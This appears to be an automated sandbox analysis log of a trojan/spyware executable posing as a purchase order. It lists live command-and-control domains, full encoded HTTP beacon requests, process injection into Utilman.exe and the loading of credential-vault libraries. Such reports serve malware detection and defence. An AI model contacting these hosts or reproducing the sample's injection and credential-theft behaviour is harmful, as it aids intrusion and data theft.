Source: PO 768733 - 6750.exe, 00000000.00000000.1228955525.0000000000B84000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameNXgv.exe* vs PO 768733 - 6750.exe
Source: PO 768733 - 6750.exe, 00000000.00000002.1242897129.0000000000F7E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs PO 768733 - 6750.exe
Source: PO 768733 - 6750.exe, 00000002.00000002.1561957739.0000000001188000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameutilman2.exej% vs PO 768733 - 6750.exe
Source: PO 768733 - 6750.exe, 00000002.00000002.1562148524.000000000170D000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs PO 768733 - 6750.exe
Source: PO 768733 - 6750.exe	Binary or memory string: OriginalFilenameNXgv.exe* vs PO 768733 - 6750.exe

Source: PO 768733 - 6750.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: PO 768733 - 6750.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.PO 768733 - 6750.exe.7f80000.4.raw.unpack, zAEmaMCbEjUsWenrKP.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.PO 768733 - 6750.exe.7f80000.4.raw.unpack, zAEmaMCbEjUsWenrKP.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.PO 768733 - 6750.exe.7f80000.4.raw.unpack, XbC8EkRmInwb6m3y8X.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.PO 768733 - 6750.exe.7f80000.4.raw.unpack, XbC8EkRmInwb6m3y8X.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.PO 768733 - 6750.exe.7f80000.4.raw.unpack, XbC8EkRmInwb6m3y8X.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/2@4/4

Source: C:\Users\user\Desktop\PO 768733 - 6750.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO 768733 - 6750.exe.log

Source: http://www.031234912.xyz/rxqp/	Avira URL Cloud: Label: malware
Source: http://www.mslgdkor.xyz/9y3c/?WXKD=Uxo1tjvQSOjHJBx4O7005prb1XoyYBiEew3PLayvGrhDG1kktUG/q5smNt5QZYm19xNTf7YleFFlbZBl4hDMyy4sofl45pmbtyh9kyf4Y926YvzUM04JUOE1Qk9ZrWq1pdP75P4=&L8pt1=9Jot2pbh	Avira URL Cloud: Label: malware
Source: http://www.mslgdkor.xyz/9y3c/	Avira URL Cloud: Label: malware
Source: http://www.031234912.xyz/rxqp/?WXKD=yNPDi0FdWVqm/NJAwgx7fO6g9YEBOC5aDAkSlWMNRo5hReSnGh8CdZXLFNAJOOuO+XCRLDSE17WkbvE519aJaLToc6Ri01peA6nlK0kwcyW1Z26mB2oX908R/QoLMJOfWibaABM=&L8pt1=9Jot2pbh	Avira URL Cloud: Label: malware
Source: http://www.mslgdkor.xyz	Avira URL Cloud: Label: malware

Source: PO 768733 - 6750.exe	Virustotal: Detection: 31%			Perma Link
Source: PO 768733 - 6750.exe	ReversingLabs: Detection: 30%

Source:	Binary string: NXgv.pdb source: PO 768733 - 6750.exe
Source:	Binary string: Utilman.pdb source: PO 768733 - 6750.exe, 00000002.00000002.1561957739.0000000001188000.00000004.00000020.00020000.00000000.sdmp, qMWzFch3YSFcC7wtIS.exe, 00000009.00000002.2496896551.000000000114B000.00000004.00000020.00020000.00000000.sdmp, qMWzFch3YSFcC7wtIS.exe, 00000009.00000003.1499016137.0000000001134000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: PO 768733 - 6750.exe, 00000002.00000002.1562148524.00000000015E0000.00000040.00001000.00020000.00000000.sdmp, Utilman.exe, 0000000A.00000002.2498467153.0000000004EDE000.00000040.00001000.00020000.00000000.sdmp, Utilman.exe, 0000000A.00000002.2498467153.0000000004D40000.00000040.00001000.00020000.00000000.sdmp, Utilman.exe, 0000000A.00000003.1561756392.00000000049E6000.00000004.00000020.00020000.00000000.sdmp, Utilman.exe, 0000000A.00000003.1563615703.0000000004B90000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: PO 768733 - 6750.exe, PO 768733 - 6750.exe, 00000002.00000002.1562148524.00000000015E0000.00000040.00001000.00020000.00000000.sdmp, Utilman.exe, Utilman.exe, 0000000A.00000002.2498467153.0000000004EDE000.00000040.00001000.00020000.00000000.sdmp, Utilman.exe, 0000000A.00000002.2498467153.0000000004D40000.00000040.00001000.00020000.00000000.sdmp, Utilman.exe, 0000000A.00000003.1561756392.00000000049E6000.00000004.00000020.00020000.00000000.sdmp, Utilman.exe, 0000000A.00000003.1563615703.0000000004B90000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: NXgv.pdbSHA256 source: PO 768733 - 6750.exe
Source:	Binary string: Utilman.pdbGCTL source: PO 768733 - 6750.exe, 00000002.00000002.1561957739.0000000001188000.00000004.00000020.00020000.00000000.sdmp, qMWzFch3YSFcC7wtIS.exe, 00000009.00000002.2496896551.000000000114B000.00000004.00000020.00020000.00000000.sdmp, qMWzFch3YSFcC7wtIS.exe, 00000009.00000003.1499016137.0000000001134000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: qMWzFch3YSFcC7wtIS.exe, 00000009.00000002.2495623221.00000000009AF000.00000002.00000001.01000000.0000000A.sdmp, qMWzFch3YSFcC7wtIS.exe, 0000000B.00000002.2497055741.00000000009AF000.00000002.00000001.01000000.0000000A.sdmp

Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 4x nop then xor eax, eax		10_2_02B79E60
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 4x nop then mov ebx, 00000004h		10_2_04C7050E

Source:	DNS query: www.xxxvideosbox.xyz
Source:	DNS query: www.globedesign.xyz
Source:	DNS query: www.031234912.xyz
Source:	DNS query: www.mslgdkor.xyz

Source: Joe Sandbox View	IP Address: 144.76.229.203 144.76.229.203
Source: Joe Sandbox View	IP Address: 13.248.169.48 13.248.169.48

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /r1zl/?WXKD=RMtocHhLv4PviDOPrz7fLuI5CuhecpuuCdUbVP3porp0rsRMSXBGxxdZR279wH8k7MV0UwICfeYC4O3VpK1XUM7OjfeUkPQONsU9uKSbOuB3Z7M7+9NrRk+hJu08ewbYw6KraIs=&L8pt1=9Jot2pbh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.xxxvideosbox.xyzUser-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.1.2576 Mobile Safari/537.35+
Source: global traffic	HTTP traffic detected: GET /l81p/?WXKD=C3JkAtcW2mlHNs/sdHAbwoHAzJwy20dAXk1d8774ItIR+3LQ/2C5+kruSp+BCP/Yeile9qllhu9r/DRrJhArjD9VFtqPabX22g8LsanpPimVHw4rN8OaIPDPwd2QDBjVULUjTs8=&L8pt1=9Jot2pbh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.globedesign.xyzUser-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.1.2576 Mobile Safari/537.35+
Source: global traffic	HTTP traffic detected: GET /rxqp/?WXKD=yNPDi0FdWVqm/NJAwgx7fO6g9YEBOC5aDAkSlWMNRo5hReSnGh8CdZXLFNAJOOuO+XCRLDSE17WkbvE519aJaLToc6Ri01peA6nlK0kwcyW1Z26mB2oX908R/QoLMJOfWibaABM=&L8pt1=9Jot2pbh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.031234912.xyzUser-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.1.2576 Mobile Safari/537.35+
Source: global traffic	HTTP traffic detected: GET /9y3c/?WXKD=Uxo1tjvQSOjHJBx4O7005prb1XoyYBiEew3PLayvGrhDG1kktUG/q5smNt5QZYm19xNTf7YleFFlbZBl4hDMyy4sofl45pmbtyh9kyf4Y926YvzUM04JUOE1Qk9ZrWq1pdP75P4=&L8pt1=9Jot2pbh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.mslgdkor.xyzUser-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.1.2576 Mobile Safari/537.35+

Source: global traffic	DNS traffic detected: DNS query: www.xxxvideosbox.xyz
Source: global traffic	DNS traffic detected: DNS query: www.globedesign.xyz
Source: global traffic	DNS traffic detected: DNS query: www.031234912.xyz
Source: global traffic	DNS traffic detected: DNS query: www.mslgdkor.xyz

Source: unknown	Process created: C:\Users\user\Desktop\PO 768733 - 6750.exe "C:\Users\user\Desktop\PO 768733 - 6750.exe"
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Process created: C:\Users\user\Desktop\PO 768733 - 6750.exe "C:\Users\user\Desktop\PO 768733 - 6750.exe"
Source: C:\Program Files (x86)\tUxnUyYKLghSnxOGjzIasEizeWNFBOJVchxRrKtIVyxmJEkHevUiLgjQXPcuSrlyaJLYV\qMWzFch3YSFcC7wtIS.exe	Process created: C:\Windows\SysWOW64\Utilman.exe "C:\Windows\SysWOW64\Utilman.exe"
Source: C:\Windows\SysWOW64\Utilman.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Process created: C:\Users\user\Desktop\PO 768733 - 6750.exe "C:\Users\user\Desktop\PO 768733 - 6750.exe"	Jump to behavior
Source: C:\Program Files (x86)\tUxnUyYKLghSnxOGjzIasEizeWNFBOJVchxRrKtIVyxmJEkHevUiLgjQXPcuSrlyaJLYV\qMWzFch3YSFcC7wtIS.exe	Process created: C:\Windows\SysWOW64\Utilman.exe "C:\Windows\SysWOW64\Utilman.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\tUxnUyYKLghSnxOGjzIasEizeWNFBOJVchxRrKtIVyxmJEkHevUiLgjQXPcuSrlyaJLYV\qMWzFch3YSFcC7wtIS.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\tUxnUyYKLghSnxOGjzIasEizeWNFBOJVchxRrKtIVyxmJEkHevUiLgjQXPcuSrlyaJLYV\qMWzFch3YSFcC7wtIS.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\tUxnUyYKLghSnxOGjzIasEizeWNFBOJVchxRrKtIVyxmJEkHevUiLgjQXPcuSrlyaJLYV\qMWzFch3YSFcC7wtIS.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\tUxnUyYKLghSnxOGjzIasEizeWNFBOJVchxRrKtIVyxmJEkHevUiLgjQXPcuSrlyaJLYV\qMWzFch3YSFcC7wtIS.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\tUxnUyYKLghSnxOGjzIasEizeWNFBOJVchxRrKtIVyxmJEkHevUiLgjQXPcuSrlyaJLYV\qMWzFch3YSFcC7wtIS.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\tUxnUyYKLghSnxOGjzIasEizeWNFBOJVchxRrKtIVyxmJEkHevUiLgjQXPcuSrlyaJLYV\qMWzFch3YSFcC7wtIS.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: 0.2.PO 768733 - 6750.exe.7f80000.4.raw.unpack, XbC8EkRmInwb6m3y8X.cs	.Net Code: XGjklSFQXe System.Reflection.Assembly.Load(byte[])
Source: 0.2.PO 768733 - 6750.exe.7330000.3.raw.unpack, gaWNLGnov1rlIG3v4D.cs	.Net Code: R28xr4yyh System.Reflection.Assembly.Load(byte[])
Source: 0.2.PO 768733 - 6750.exe.323c808.0.raw.unpack, gaWNLGnov1rlIG3v4D.cs	.Net Code: R28xr4yyh System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 0_2_013ADA52 pushfd ; retf	0_2_013ADA81
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 0_2_073AE7A5 pushfd ; iretd	0_2_073AE7A6
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 0_2_073AE8DE pushfd ; iretd	0_2_073AE8DF
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 0_2_0801C602 pushad ; ret	0_2_0801C609
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_0040A9ED push ebx; ret	2_2_0040A9EE
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_0040D256 pushad ; ret	2_2_0040D259
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_00401ADF push edi; retf	2_2_00401B02
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_00403320 push eax; ret	2_2_00403322
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_00402DD3 pushad ; ret	2_2_00402DD4
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_004115DC push edi; ret	2_2_004115E6
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_004115DC push edx; retf	2_2_00411701
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_004085E2 push es; ret	2_2_004085F8
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_00408588 push esp; ret	2_2_0040858A
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_004085A0 push ss; iretd	2_2_004085E0
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_00418E38 push ebx; iretd	2_2_00418E45
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_004116C1 push edx; retf	2_2_00411701
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_016109AD push ecx; mov dword ptr [esp], ecx	2_2_016109B6
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04D427FA pushad ; ret	10_2_04D427F9
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04D4225F pushad ; ret	10_2_04D427F9
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04D4283D push eax; iretd	10_2_04D42858
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04D709AD push ecx; mov dword ptr [esp], ecx	10_2_04D709B6
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_02B7E2B9 push edi; ret	10_2_02B7E2C3
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_02B7E2B9 push edx; retf	10_2_02B7E3DE
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_02B7E39E push edx; retf	10_2_02B7E3DE
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_02B8832E push 26FEC064h; ret	10_2_02B8833A
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_02B8834C push 8FCC23F0h; iretd	10_2_02B8836E
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_02B8201D push edi; iretd	10_2_02B82025
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_02B752BF push es; ret	10_2_02B752D5
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_02B7527D push ss; iretd	10_2_02B752BD
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_02B75265 push esp; ret	10_2_02B75267
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_02B8B378 push edi; iretd	10_2_02B8B3A1

Source: 0.2.PO 768733 - 6750.exe.7f80000.4.raw.unpack, D8D8XR6MVfhKcfmSYN.cs	High entropy of concatenated method names: 'vBurqRv7Pw', 'VdaroKvyvG', 'xRQrrvSphB', 'BDorhsLYM3', 'PP8rZoJA2C', 'ipmr22aKWu', 'Dispose', 'jPqUSFInmL', 'WSGU3YxWFh', 'kbDUKfLAKT'
Source: 0.2.PO 768733 - 6750.exe.7f80000.4.raw.unpack, bmY1qLjij5QZpv7pUQ.cs	High entropy of concatenated method names: 'tacKHqoAVT', 'L6QKMGTkwE', 'cOoKC4d1HL', 'LbqKjRbcuq', 'bcfKqoqJeK', 'Pg6KBRtrmi', 'J0NKofBK4F', 'oBrKU6WnAl', 'uTCKrklfEe', 'cRqK8bUcef'
Source: 0.2.PO 768733 - 6750.exe.7f80000.4.raw.unpack, gsUp5T01i3hSnGbdKoy.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'MCB85yNaPT', 'M0w8bMEDeK', 'zJV8L7D1G1', 'yAK8QFStnP', 'Ows8PIRgH9', 'N0F8INqrQ1', 'fEt8woEWcF'
Source: 0.2.PO 768733 - 6750.exe.7f80000.4.raw.unpack, EGWy38LqbVR4rfS2q5.cs	High entropy of concatenated method names: 'rUBYCJRNgr', 'yAgYjVgkQ5', 'PCiYENklcw', 'wGlYxwP9ce', 'KmQYXHjhal', 'LcXYtH1EvL', 'BcKYdMa1vX', 'niQYgx4bQE', 'GoKYWVkpAv', 'G9kY5Tjk6E'
Source: 0.2.PO 768733 - 6750.exe.7f80000.4.raw.unpack, bwmN1a0kjo9ysEEMmTF.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'TQevrpfjNs', 'lRHv8S5ZRW', 'IgkvhLrTbn', 'coXvvf27pc', 'OdRvZaIuxn', 'Sx2vyXMxHW', 'Kkqv2rSMcS'
Source: 0.2.PO 768733 - 6750.exe.7f80000.4.raw.unpack, DiCurJzi7OnpTJZJs5.cs	High entropy of concatenated method names: 'xRr8MJIXmU', 'Rvi8CEqHMt', 'if88jq1foZ', 'jpk8E2ap3u', 'y878xwXV4n', 'P6V8XJLe4M', 'q2v8tEx7pH', 'HLg821lUkT', 'Oa88uUCbqK', 'eZ08aX7P8o'
Source: 0.2.PO 768733 - 6750.exe.7f80000.4.raw.unpack, C3Qq4G003JiwkAudo6B.cs	High entropy of concatenated method names: 'pIQ8fINmrt', 'hAo8zNNSdT', 'KWhh1GAJsJ', 'tHuh06TwYa', 'DQRhO26ukV', 'pJwhivqnny', 'DjdhkmlcFD', 'tDhhpWBecy', 'Ls5hSvpUm8', 'wEHh3nKwgB'
Source: 0.2.PO 768733 - 6750.exe.7f80000.4.raw.unpack, XbC8EkRmInwb6m3y8X.cs	High entropy of concatenated method names: 'a9QipFKyaN', 'luIiSdc4Nq', 'afRi32Ip1D', 'M6wiKIuCxF', 'N5UicBjKCw', 'JUriVQtfBm', 'n2Ti7vSqw3', 'MgeiRlJES5', 'g0XiA2p3ct', 'tefiTVkAJ1'
Source: 0.2.PO 768733 - 6750.exe.7f80000.4.raw.unpack, DT8D5XOG779NFQvuS8.cs	High entropy of concatenated method names: 'rG2lJtE1C', 'tKQHIw6nI', 'p6FM0pC9Q', 'mFJeGHByR', 'AoUjKh57h', 'nLwFhKdGd', 'q45Kpitbub7j94fT8E', 'nFUW1cQR8nISHcK15b', 'pxsUXfsyP', 'dUx8ML6tQ'
Source: 0.2.PO 768733 - 6750.exe.7f80000.4.raw.unpack, K9AAU7EpJFqQqPvwPT.cs	High entropy of concatenated method names: 'Tp2VptBnia', 'GemV3haWdn', 'eGdVcimjHL', 'mkCV7sDgyo', 'spVVRqIC1W', 'VQwcGxcgdA', 'K6lcNSChdW', 'u94c6A0GAt', 'b02c4OPR0P', 'qnUcs5u1ZG'
Source: 0.2.PO 768733 - 6750.exe.7f80000.4.raw.unpack, WrdxTXFvAmlUQRIrOU.cs	High entropy of concatenated method names: 'YY6cnllqW8', 'qkyceFVpJB', 'e0yKJNhKwD', 'k3jKX1Y4yV', 'dD4KtSTwXb', 'UEwKDK1HKp', 'PSKKdZdRPB', 'DxNKge21b9', 'svXKmWf8g8', 'HVHKWZEk44'
Source: 0.2.PO 768733 - 6750.exe.7f80000.4.raw.unpack, AygVyfkkqL8H17BxlE.cs	High entropy of concatenated method names: 'BRl07AEmaM', 'PEj0RUsWen', 'Qij0T5QZpv', 'jpU09Q6rdx', 'kIr0qOUD9A', 'lU70BpJFqQ', 'V6ew2Sv3qaXFlQr9Ir', 'A1piDnWY3mWeSYLL6N', 'q3G00SLctC', 'qYw0i3XPyT'
Source: 0.2.PO 768733 - 6750.exe.7f80000.4.raw.unpack, R7wCMy390UlOJBkyiZ.cs	High entropy of concatenated method names: 'Dispose', 'YhK0scfmSY', 'h0EOxpXcPR', 'dcdvGulndZ', 'UGG0ftIpww', 'FC10zFG6FH', 'ProcessDialogKey', 'MCJO1QRPZH', 'JryO0NExaM', 'lNeOORDpYF'
Source: 0.2.PO 768733 - 6750.exe.7f80000.4.raw.unpack, zAEmaMCbEjUsWenrKP.cs	High entropy of concatenated method names: 'KWI3QMgRn5', 'O1u3P2m87m', 'WfS3I3egrQ', 'J3o3wGJR3T', 'dxb3GlmskQ', 'hkt3NSVV99', 'B3m36dXaiX', 'qgk34dlwZi', 'Id93sH8wti', 'e943fojeI6'
Source: 0.2.PO 768733 - 6750.exe.7f80000.4.raw.unpack, WRrmI9deYLLO69OLFt.cs	High entropy of concatenated method names: 'QPK7SqZk90', 'nMZ7KCgAwJ', 'Npq7VuXNdW', 'yKAVf6LqDk', 'WEZVzcbyRQ', 'O7V71HgcFC', 'kpu70mEsp3', 'btP7O4qMVj', 'Toh7iyWYN5', 'Pbu7kFguOU'
Source: 0.2.PO 768733 - 6750.exe.7f80000.4.raw.unpack, kT5QqGXAK94xHOeIXD.cs	High entropy of concatenated method names: 'VG8V2XkcHr', 'CaJVujwpae', 'hnWVlMqbK6', 'iQmVHSrWsm', 'RcEVMBBtir', 'ExfVekWiq3', 'RAYVjH99ph', 'zNFVFNwQ58', 'Qh5ZWyXILh1I0ZQWSSX', 'cpm4L4XM17Ud44gmuKi'
Source: 0.2.PO 768733 - 6750.exe.7f80000.4.raw.unpack, PnZZR4KClw0TF9pimn.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'XGxOs5chX8', 'rZrOfCSkl0', 'RBPOzjCttJ', 'Dwri1Y3AB1', 'EF9i0i8VeX', 'PQCiOjOPZL', 'zsOiiioek5', 'XmWEj7DCEX0qG6mYo87'
Source: 0.2.PO 768733 - 6750.exe.7f80000.4.raw.unpack, CXYNmeNSHp1qyy5SKX.cs	High entropy of concatenated method names: 'n1bo4OmHrD', 'EZBofV2fC0', 'UWkU16ayVx', 'F80U0p9nK3', 'Njwo5EOjS6', 'PQAobb5hLH', 'YKdoLUOxM9', 'b7RoQ7s40Q', 'DfloPK0JHl', 'j9woIKTVwh'
Source: 0.2.PO 768733 - 6750.exe.7f80000.4.raw.unpack, eLwKn00O2A52U8647X1.cs	High entropy of concatenated method names: 'ToString', 's3HhCfC5kM', 'ApJhjPd91J', 'JcAhFVWgJv', 'iJihEfjlKT', 'qX8hxAQkV1', 'dO4hJpfJPs', 'qmXhX4IuZR', 'JTfaPvhDg1qiE4ACRQT', 'S22kcZhX5NeEKYF806V'
Source: 0.2.PO 768733 - 6750.exe.7f80000.4.raw.unpack, VBEp6gmlLlctvxLqHf.cs	High entropy of concatenated method names: 'Mfi7utRTtK', 'Id37abDIXm', 'V4a7lWfUYj', 'sBU7H2RWN8', 'nLQ7n5yPhL', 'lBt7MHcnev', 'ike7eSIrjK', 'PQT7C0ct9f', 'bmP7jEOioo', 'jGG7FLYLjf'
Source: 0.2.PO 768733 - 6750.exe.7f80000.4.raw.unpack, HQRPZHstryNExaMANe.cs	High entropy of concatenated method names: 'gVdrEoIikj', 'RUlrxHOMuF', 'hM1rJ24iZY', 'gjprXot9uG', 'q2ortXdoQ5', 'kSvrDp6tHr', 'weJrd3x7PR', 'fq9rg7sYvB', 'OdGrm7OZJG', 'hprrWRQxva'
